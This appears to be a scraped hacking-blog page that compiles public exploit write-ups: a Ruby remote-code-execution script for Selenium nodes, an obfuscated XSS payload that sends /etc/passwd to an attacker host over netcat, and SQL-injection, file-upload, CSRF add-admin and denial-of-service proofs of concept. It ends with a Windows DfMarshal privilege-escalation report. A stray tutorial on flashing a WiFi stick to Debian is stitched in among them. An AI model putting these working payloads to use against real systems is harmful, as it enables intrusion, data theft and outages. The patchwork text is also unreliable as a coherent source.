# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)
# Date: 2021-05-27
# Exploit Author: Jon Stratton
# Vendor Homepage: https://www.selenium.dev/
# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar
# Version: 3.141.59
# Tested on: Selenium Server 3.141.59, webdriver, geckodriver
#
# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb
#
# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started.
#
# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh”
#
# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system.
#
# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type.
#!/usr/bin/env ruby
require 'optparse'
require 'net/http'
require 'json'
require 'uri'
require 'zip'
require 'base64'
options = {}
OptionParser.new do |opts|
opts.banner = 'Usage: example.rb [options]'
opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h|
options[:hub] = h
end
opts.on('--help', 'Prints this help') do
puts opts
exit
end
end.parse!
hub_url = options[:hub]
payload = 'rm -rf $0
echo success > /tmp/selenium_node_rce.txt'
# Build profile zip file.
stringio = Zip::OutputStream::write_buffer do |io|
# Create a handler for shell scripts
io.put_next_entry("handlers.json")
io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
end
stringio.rewind
encoded_profile = Base64.strict_encode64(stringio.sysread)
# Create session with our new profile
newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}}
uri = URI.parse(hub_url)
http = Net::HTTP.new(uri.host, uri.port)
# Start session with encoded_profile and save session id for cleanup.
uri = URI.parse("%s/session" % [hub_url])
request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
request.body = JSON.generate(newSession)
response = http.request(request)
sessionId = JSON.parse(response.body)["value"]["sessionId"]
# URL.
data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)]
uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId])
request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
request.body = JSON.generate(:url => data_url)
response = http.request(request)
# End session(not working)
uri = URI.parse("%s/session/%s" % [hub_url, sessionId])
request = Net::HTTP::Delete.new(uri.request_uri)
http.request(request)
exit
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109163
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: SnipCommand 0.1.0 - XSS to RCE
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/gurayyarar/SnipCommand
# Version: 0.1.0
# Tested on: Windows, Linux, MacOs
# Software Description:
Open source command snippets manager for organize and copy fast.
It helps you create, organize and store your commands (Excel formulas, Sql Queries, Terminal commands, etc.) with dynamic parameters for quick copy to it. Describe your commands with dynamic parameters also support documentation about your snippets. You can select or specify your dynamic values using with selectbox/inputbox for ready to paste the workspace. You can organize with tags.
# Vulnerability Description:
The software allows you to store payloads in the form of files or as titles in their dynamic values, once the malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/I2reH1M
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
Can you enter Debian with portable WIFI? That's right, there is nothing you can't do, only you can't imagine. Let’s take a look now! By inputting the debian system into the portable WiFi, we can install pagodas, build Ha, etc. And it doesn’t require much power consumption, it’s so pleasant to think about it!
Hardware introduction
In this article, we use the portable WiFi of Qualcomm 410 processor. Other types of portable WiFi may not be successfully flashed. Please confirm the model before purchasing.
Installing the driver
Before using, you can contact the merchant or download and install the driver according to the product name.
ADB debugging
In the flash package directory, execute the cmd command.
#Check the device connection status
adb.exe devices
#Enter Fastboot mode
adb.exe reboot bootloader
#Check whether to enter fastboot
fastboot.exe devices 
Flashing
After the device enters Fastboot mode, we double-click to run the flash.bat file and automatically flash the machine throughout the process. Wait patiently for the flash to complete.
Equipment Information
After the flashing is completed, the device information is as follows:
WiFi: 4G UFI 123456 (password:12345678) IP: 192.168.68.1SSH: root (password:1)
Connection Test
Our connection WiFi is called 4G UFI 123456. Use SSH tools to connect.
Configure the network
Now we need to connect to WiFi at home. Turn off its transmit (AP) function. Because portable WiFi supports USB sharing network and WiFi network. (Note, don’t turn off WiFi first, otherwise you won’t be able to connect to your portable WiFi.) Configure the USB network to open the device manager and you will see the following devices.
Click Update Driver and select the second one.
Select USB Composite Device
After the update is completed, unplug the device again. The following situation will occur at this time.
We updated the same method, selected the network adapter, and selected it according to the figure below.
After completion, we can command ipconfig to check the network situation.
Turn off portable WiFi to connect to home WiFi
Execute the command nmtui in the terminal to start the graphical interface.
Return to the homepage and click Enable Network.
After selecting WiFi, enter your password to connect.
Installing the pagoda
For testing, I installed the pagoda here (it is not recommended to install because the space is too small) 
Home Page 
Effect Display
Finally, we find a charger head and plug it in the corner. A small portable server is ready.
Insufficient
The memory and disk capacity are relatively small. It should be fine to run the HA Ngingx three-piece set.
# Exploit Title: Gate Pass Management System 2.1 - 'login' SQL Injection
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.livebms.com
# Software Link: https://netcologne.dl.sourceforge.net/project/gatepass/gpms_Update.zip
# Version: 2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/login-exec.php
#
POST /[PATH]/login-exec.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=dfbpcp36b5ura1aurmtm3dqbr0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
login=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&Submit=Login
HTTP/1.1 302 Found
Date: Thu, 01 Nov 2018 12:08:54 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e7ed7dtjg0hq3qsv0vil80o086; path=/
Location: gpms/index.php
Content-Length: 281
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: WinMTR 0.91 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://winmtr.net
# Software Link: http://winmtr.net/winmtr_download/
# Version: 0.91
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Host: Payload
#!/usr/bin/python
buffer = "A" * 238
payload = buffer
try:
f=open("exp.txt","w")
print "[+] Creating %s bytes evil payload." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created."
# Exploit Title: 2-Plan Team 1.0.4 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://2-plan.com/
# Software Link: https://datapacket.dl.sourceforge.net/project/to-plan-team/1.1.0/2-plan-team.tgz
# Version: 1.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Users..
# http://localhost/[PATH]/managefile.php?action=upload&id=1
#
POST /[PATH]/managefile.php?action=upload&id=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/managefile.php?action=showproject&id=1&mode=added
Cookie: PHPSESSID=2e9jrile8jqaqe9q1acs4i30j6
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------
10091208795715239061851145440
Content-Length: 1192
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="numfiles"
1
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="upfolder"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="userfile1-title"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="userfile1"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="userfile1"
phpinfo.php
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="userfile1-tags"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="desc"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="visible[]"
-----------------------------10091208795715239061851145440
Content-Disposition: form-data; name="sendto[]"
all
-----------------------------10091208795715239061851145440--
HTTP/1.1 302 Found
Date: Wed, 14 Nov 2018 23:41:03 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
GET /[PATH]/files/standard/ef/1/phpinfo_3978873.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2e9jrile8jqaqe9q1acs4i30j6
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 23:41:07 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# Exploit Title: PHP Mass Mail 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-14
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://phpmassmail.sourceforge.io/
# Software Link: https://netix.dl.sourceforge.net/project/phpmassmail/phpmassmail/1.0.0/phpmassmail.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/send.php
#
# http://localhost/[PATH]/upload/[FILE]
# ....
#07 require("class.phpmailer.php");
#08
#09 $uploaddir = 'upload';
#10 $key = 0;
#11 $tmp_name = $_FILES["userfile"]["tmp_name"][$key];
#12 $name = $_FILES["userfile"]["name"][$key];
#13 $sendfile = "$uploaddir/$name";
#14 move_uploaded_file($tmp_name, $sendfile);
# ....
POST /[PATH]/send.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/octet-stream
Content-Length: 716
Cookie: PHPSESSID=dhq0fbvco8d0sc0lem3l2kktk0
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------265001916915724: undefined
Content-Disposition: form-data; name="userfile[]"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------265001916915724--
HTTP/1.1 200 OK
Date: Wed, 14 Nov 2018 19:27:39 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 719
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/send.php
#
# http://localhost/[PATH]/upload/[FILE]
#
<html>
<body>
<form method="post" action="send.php" enctype="multipart/form-data">
<input name="userfile[]" type="file">
<input value="Send mail" type="submit">
</form>
</body>
</html>
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-09
# Exploit Author: Dawood Ansar
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19136
# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01(https://github.com/domainmod/domainmod/issues/79)
# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php
# page and inject a javascript XSS payload in raid parameter
# POC:
http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1
# Exploit Title: Mumsoft Easy Software 2.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.munsoft.com/EasyRARRecovery/
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyRARRecovery/download/EasyRARRecovery-2.0-Setup.exe
# Other Affected software:
# Easy Archive Recovery 2.0
# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyArchiveRecovery/download/EasyArchiveRecovery-2.0-Setup.exe
# Easy ZIP Recovery 2.0
# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyZIPRecovery/download/EasyZIPRecovery-2.0-Setup.exe
# Easy Access Recovery 2.0
# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyAccessRecovery/download/EasyAccessRecovery-2.0-Setup.exe
# Easy PowerPoint Recovery 2.0
# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyPowerPointRecovery/download/EasyPowerPointRecovery-2.0-Setup.exe
# Easy Excel Recovery 2.0
# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyExcelRecovery/download/EasyExcelRecovery-2.0-Setup.exe
# Easy Word Recovery 2.0
# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyWordRecovery/download/EasyWordRecovery-2.0-Setup.exe
# Version: 2.0
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Help / Enter a registration key...
#!/usr/bin/python
buffer = "A" * 256
payload = buffer
try:
f=open("exp.txt","w")
print "[+] Creating %s bytes evil payload." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created."
# Exploit Title: Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-15
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.munsoft.com/EasyOutlookExpressRecovery/
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOutlookExpressRecovery/download/EasyOutlookExpressRecovery-2.0-Setup.exe
# Version: 2.0
# Other Affectted Software:
# Easy Outlook Recovery 2.0
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOutlookRecovery/download/EasyOutlookRecovery-2.0-Setup.exe
# Easy Mail Recovery 2.0
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyMailRecovery/download/EasyMailRecovery-2.0-Setup.exe
# Easy Office Recovery 2.0
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOfficeRecovery/download/EasyOfficeRecovery-2.0-Setup.exe
# Easy File Undelete 3.0
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyFileUndelete/download/EasyFileUndelete-3.0-Setup.exe
# Easy NTFS Data Recovery 3.0
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyNTFSDataRecovery/download/EasyNTFSDataRecovery-3.0-Setup.exe
# Easy FAT Data Recovery 3.0
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyFATDataRecovery/download/EasyFATDataRecovery-3.0-Setup.exe
# Easy Drive Data Recovery 3.0
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyDriveDataRecovery/download/EasyDriveDataRecovery-3.0-Setup.exe
# Easy Digital Photo Recovery 3.0
# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyDigitalPhotoRecovery/download/EasyDigitalPhotoRecovery-3.0-Setup.exe
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Help / Enter a registration key...
#!/usr/bin/python
buffer = "A" * 260
payload = buffer
try:
f=open("exp.txt","w")
print "[+] Creating %s bytes evil payload." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created."
# Exploit Title: XMPlay 3.8.3 - '.m3u' Denial of Service (PoC)
# Date: 2018-11-18
# Exploit Author: s7acktrac3
# Vendor Homepage: https://www.xmplay.com/
# Software Link: https://support.xmplay.com/files_view.php?file_id=676
# Version: 3.8.3 (latest)
# Tested on: Windows XP/7/8
# CVE : N/A
#
# Lauch XMPlay and either drag xmplay.m3u into the XMPlay window or
# File Menu-> select winamp.m3u and Crash!
# -*- coding: utf-8 -*-
#
# Note: Successfully can overwrite the SEH chain & control the handler and nSEH
# but the address get mangled & unreconizable, for this reason could not turn into
# code execution.
import struct
from struct import pack
file_data = "#EXTM3U\n\r"
file_data += "#EXTINF:200,Sleep Away\n\r"
file_data += "http://test."
max_size = 3000 - 1
nseh_offset = 656
seh_overwrite = pack("<L", 0x00402450)
payload = "A" * nseh_offset # padding for nseh
payload += "BBBB" # nseh
payload += seh_overwrite # seh
#padding for rest of payload - pipe "|" is needed somehow to force crash
payload += "D" *(max_size - len(payload)) + "|"
print "[+] Creating .m3u file with payload size: "+ str(len(payload))
exploit = file_data + payload
file = open('xmplay.m3u','w');
file.write(exploit);
file.close();
print "[+] Done creating the file"
#!/bin/bash
help() {
echo "Usage poc generator: `basename $0` gen WIDTHxHEIGHT NAME.xbm [minimal]"
echo " Example gen: `basename $0` gen 512x512 poc.xbm"
echo "Usage result recovery: `basename $0` recover SAVED_PREVIEW.png|jpeg|gif|etc"
echo " Example recovery: `basename $0` recover avatar.png"
}
if [ "$1" == "-h" ]; then
help;
exit 0
fi
if [ "$1" == "gen" ]; then
echo "Generating..."
convert -size $2 xc:white $3
sed -i '0,/0x../s//0x80000001/' $3
if [ "$4" == "minimal" ]; then
echo "Shrink to minimal body size mode"
sed -i 's/0x00//g' $3
sed -i 's/,//g' $3
sed -i '/^\s*$/d' $3
fi
echo "Done"
exit 0
fi
if [ "$1" == "recover" ]; then
convert $2 temp.xbm
cat temp.xbm | grep -o '0x..' | xxd -r -p | strings -3
rm temp.xbm
exit 0
fi
help;
# Exploit Title: Ticketly 1.0 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-11-19
# Google Dork: N/A
# Vendor: Abisoft (https://abisoftgt.net)
# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql
# Affected Version: 1.0
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows & Ubuntu
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
# 4. References:
# https://hackpuntes.com/cve-2018-18922-ticketly-1-0-escalacion-de-privilegios-crear-cuenta-administrador/
# 1. Technical Description:
# Ticketly version 1.0 are affected by a privilege escalation vulnerability,
# an attacker could create an administrator user account by sending a POST
# request to the resource /action/add_user.php without authentication.
# 2. Proof Of Concept (PoC):
# Send request curl:
curl -i -s -k -X $'POST' \
-H $'Host: [HOST]' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 82' \
--data-binary $'name=[NAME]&lastname=[LASTNAME]&email=[EMAIL]&status=1&password=[PASS]' \
$'http://[PATH]/action/add_user.php'
Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master)
Platform: Windows 10 1803 (not tested earlier, although code looks similar on Win8+)
Class: Elevation of Privilege
Note, this is the master issue report for the DfMarshal unmarshaler. I’m reporting multiple, non-exhaustive, issues in this marshaler in case you decide that you want to try and “fix” it rather than blocking the marshaler outright.
Summary: The unmarshaler for Storage objects is complete unsafe and yet is marked as a system trusted marshaler. There are multiple ways of abusing this to unmarshaler to get privilege escalation.
Description:
Storage objects are used by different parts of the OS and Office as a structured container format for sub-streams of data. You can create a new instance using APIs such as StgCreateDocFile. Being a COM object it can be marshaled around between processes, including special support during COM activation through CoGetInstanceFromIStorage. While all the important interfaces have proxy support the object also supports custom marshaling to improve performance when marshaling either INPROC or a LOCAL context.
The COM class DfMarshal CLSID:0000030b-0000-0000-c000-000000000046 (in coml2.dll on Windows 10, ole32.dll downlevel) implements the custom unmarshaling for storage objects. When marshaling the implementation generates the following output:
MSHFLAGS <4 bytes>
Object Type IID <16 bytes> - Either IID_IStream or IID_IStorage.
Standard Marshaled Interface <Variable> - Used if the custom marshal fails.
SDfMarshalPacket <0x70 bytes on 64 bit, 0x44 on 32 bit> - Data for the custom marshal.
The SDfMarshalPacket has the following structure, note this comes from the Windows 8.1 private symbols for OLE32.DLL which are available on the public symbol server. On Windows 10 when the code was moved to COML2.DLL the private symbols didn’t move with it, however the code only seems to have had minor changes between 8.1 and 10.
struct SDfMarshalPacket
{
CBasedPubDocFilePtr pdf;
CBasedPubStreamPtr pst;
CBasedSeekPointerPtr psp;
CBasedMarshalListPtr pml;
CBasedDFBasisPtr pdfb;
CBasedGlobalContextPtr pgc;
CBasedGlobalFileStreamPtr fsBase;
CBasedGlobalFileStreamPtr fsDirty;
CBasedGlobalFileStreamPtr fsOriginal;
unsigned int ulHeapName;
unsigned int cntxid;
GUID cntxkey;
CPerContext *ppc;
HANDLE hMem;
};
The Ptr structures are native pointer sized values which are used as relative offsets into a shared memory section. The cntxid is the PID of the marshaling process, the hMem a handle to a section object which contains the shared allocation pool for use between processes. When the custom unmarshaling process starts the receiving process will try and open the process containing the shared memory handle (using cntxid and hMem) and duplicate it into the current process. Then it will map the section into memory and rebuild a local storage object based on the various relative pointers stored in the marshaled structure. Note that there is provision for performance improvements for in-process marshaling where cntxkey is a random GUID value which is known only to the process (it’s not set for cross context marshal). In that case ppc is used as a valid pointer, but ppc is always set so this leaks memory layout information to the process the object is marshaled to (not reporting this one separately).
This will only work if the process can open the marshalling process for PROCESS_DUP_HANDLE access. This restricts this to processes at the same or higher privilege, therefore an obvious target would be unmarshaling this data from a user into a system service. Fortunately there’s some protection against that, the unmarshal occurs in CSharedMemoryBlock::InitUnMarshal and looks something like the following:
int CSharedMemoryBlock::InitUnMarshal(void *hMem,
unsigned int dwProcessId,
unsigned int culCommitSize) {
unsigned int dwCurrentSession;
unsigned int dwSourceSession;
ProcessIdToSessionId(dwProcessId, &dwSourceSession);
ProcessIdToSessionId(GetCurrentProcessId(), &dwCurrentSession);
if (dwSourceSession != dwCurrentSession)
return E_ACCESSDENIED;
HANDLE hProcess = OpenProcess(PROCESS_DUP_HANDLE, 0, dwProcessId);
...
}
The code contains a check that the process containing the shared section is in the same console session as the process doing the unmarshal. If they’re not in the same session then the unmarshal process will fail. It’s unclear if this is a security check or whether it’s a reliability check, and even if it’s a security check it’s not hard to find a way around this.
One thought would be to try and use this to escape a sandbox, such as AppContainer as the sandbox process and a likely COM target would all be in the same session. While there are checks for the current process being in an AppContainer (so an AC process will never use the custom unmarshaling) there are no checks for the caller being an in AC. In fact there would be as the default HYBRID custom marshaling policy should kick in and block the custom unmarshal. However as DfMarshal is marked as a system trusted marshaler, it will still execute. It turns out that it’s difficult to trivially use this from a sandbox as later in the initialization an event object is opened by name (in CDfMutex::Init) from the current session’s BaseNamedObjects directory which an AC can’t write to. However if some other process in the same session had already shared a storage object, creating the event _and_ the AC could read the randomly assigned name it could be hijacked.
So we’re back to either abusing something like UAC elevated processes/runas on the same desktop (doable but not a security boundary) or try and bypass the check to unmarshal from a user process into a system process. The key is the knowledge that the unmarshaler will open any process we tell it to, including other services in Session 0. The code could try and query the PID of the caller through COM (and thereby through MSRPC/ALPC) but it doesn’t. This means as long as we can get a writable section shared between our process and a process in session 0 we can tell the unmarshaler to look there for the section handle.
After some investigation I discovered that the Audio Service will create a writable section handle for you (actually via AUDIODG) and share it back to you when you create a rendering buffer (I didn’t investigation any further). This section is large enough to copy our existing shared memory from the marshal process. We can therefore create the section, copy over the existing shared memory (or fake one from scratch) then provide the PID and handle to the system service for use in unmarshaling. We don’t have to guess the handle as the handle table from NtQuerySystemInformation reports object addresses so you just match the current process’s handle and the AUDIODG handles. When the system service unmarshals this it will now pass the session check, we also have to create a duplicate event object in the global BNO but a normal user has access to that.
During the unmarshal process the implementation interacts with the shared memory as an allocation region, this is where all the issues occur. In theory if you could find a system process which actually interacts with the storage object you might find some more interesting behaviors (such as getting the system service to write to arbitrary files) but everything I’ll describe in other issues all occur during the unmarshal process and so can be used to target any system COM service using CoGetInstanceFromStorage. Basically the storage object code uses the shared memory section as if everything is running at the same level of trust and doesn’t take any real precautions against a malicious actor which has access to the same shared section or controls the existing data.
As mentioned I’m reporting 4 other issues/bug classes at the same time. This is the master issue, and potentially you can mark the others as duplicates depending on how you want to fix them. Though I’d remind you that when you marked a bug as duplicate last time it didn’t get fixed so perhaps exercise caution. The four issues I’m reporting at the same time are:
- DfMarshal Missing Bounds Checking Elevation of Privilege
- DfMarshal Shared Allocator Elevation of Privilege
- DfMarshal Arbitrary File Delete Elevation of Privilege
- DfMarshal Handle Duplication TOCTOU Elevation of Privilege
Possible fixing ideas:
DO NOT just remove the class from the trusted marshaler’s list. Some COM services such as SearchIndexer runs without the EOAC_NO_CUSTOM_MARSHAL flag set.
You could query the PID of the caller in the unmarshal process and only duplicate from that process, or processes in the same session as the caller. However bear in mind that when unmarshaling during activation (through CoGetInstanceFromStorage) the caller will actually be RPCSS so this might be bypassable. Depending on how you did it this might mean that a session hopping bug (which I’ve found before) would allow you to elevate privilege.
You could just rewrite the whole thing, it’s an incredibly bad piece of code.
